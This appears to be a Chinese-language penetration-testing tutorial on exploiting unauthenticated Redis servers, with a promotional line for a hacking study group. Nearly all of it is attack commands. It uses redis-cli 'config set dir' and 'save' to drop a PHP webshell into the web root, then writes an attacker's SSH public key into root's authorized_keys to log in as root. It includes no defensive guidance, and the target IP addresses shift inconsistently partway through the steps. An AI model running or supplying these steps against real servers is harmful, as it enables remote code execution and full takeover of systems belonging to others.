Redis未授权访问漏洞的利用

web渗透学习交流群:811401950

利用redis写webshell
在redis-cli中写入以下命令:
config set dir /var/www/html/

config set dbfilename redis.php

set webshell “<?php phpinfo(); ?>”
save
Redis未授权访问漏洞的利用
然后看一下目录下是否生成了一个redis.php的文件
Redis未授权访问漏洞的利用
可以看到生成了,查看一下文件的内容
Redis未授权访问漏洞的利用
在浏览器中访问一下这个文件,成功解析,内容改成一句话木马,即可getshell
Redis未授权访问漏洞的利用
Redis 未授权访问配合 SSH key 文件利用
首先在攻击机生成密匙:ssh-****** –t rsa
Redis未授权访问漏洞的利用
看到生成的文件被保存在了上图的路径中,cd /root/.ssh/,并cat查看文件内容
Redis未授权访问漏洞的利用
然后将公钥写入key.txt中
(echo -e “\n\n”; cat id_rsa.pub; echo -e “\n\n”) > key.txt
Redis未授权访问漏洞的利用
然后连接redis进行写入
$ cat key.txt | redis-cli -h 192.168.136.133 -x set crackit
$ redis-cli -h 192.168.1.11
$ 192.168.136.133:6379> config set dir /root/.ssh/
$ 192.168.1.11:6379> config set dbfilename “authorized_keys”
$ 192.168.1.11:6379> save
Redis未授权访问漏洞的利用
然后去目标机看一下是否生成
Redis未授权访问漏洞的利用
然后回到攻击机,利用自己的**进行ssh登录:
ssh –i id_rsa [email protected]
Redis未授权访问漏洞的利用